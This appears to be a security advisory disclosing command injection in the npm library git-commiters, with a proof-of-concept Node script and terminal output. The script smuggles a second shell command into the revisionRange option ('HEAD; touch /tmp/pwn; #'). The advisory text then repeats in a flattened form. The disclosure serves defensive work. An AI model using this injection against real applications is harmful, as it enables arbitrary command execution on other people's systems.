Background on the vulnerability
This vulnerability manifests with the library's primary exported API: gitCommiters(options, callback)
which allows specifying options such as cwd
for current working directory and revisionRange
as a revision pointer, such as HEAD
.
However, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution.
Exploit
- Install
[email protected]
or earlier
- Initiaizlie a new Git directory with commits in it
- Create the following script in that directory:
var gitCommiters = require("git-commiters");
var options = {
cwd: "./",
revisionRange: "HEAD; touch /tmp/pwn; #",
};
gitCommiters(options, function (err, result) {
if (err) console.log(err);
else console.log(result);
});
- Observe new file created on disk at
/tmp/pwn
The git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application.
@lirantal ➜ /workspaces/git-commiters.js (master) $ node app.js
[
{
email: '[email protected]',
name: 'Morton Fox',
deletions: 1,
insertions: 1,
commits: 1
},
{
email: '[email protected]',
name: 'Riceball LEE',
deletions: 11,
insertions: 1198,
commits: 7
}
]
@lirantal ➜ /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn
-rw-r--rw- 1 codespace codespace 0 Jul 1 06:09 /tmp/pwn
Credit
Liran Tal
References
Background on the vulnerability
This vulnerability manifests with the library's primary exported API:
gitCommiters(options, callback)
which allows specifying options such as
cwd
for current working directory andrevisionRange
as a revision pointer, such asHEAD
.However, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution.
Exploit
[email protected]
or earlier/tmp/pwn
The git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application.
Credit
Liran Tal
References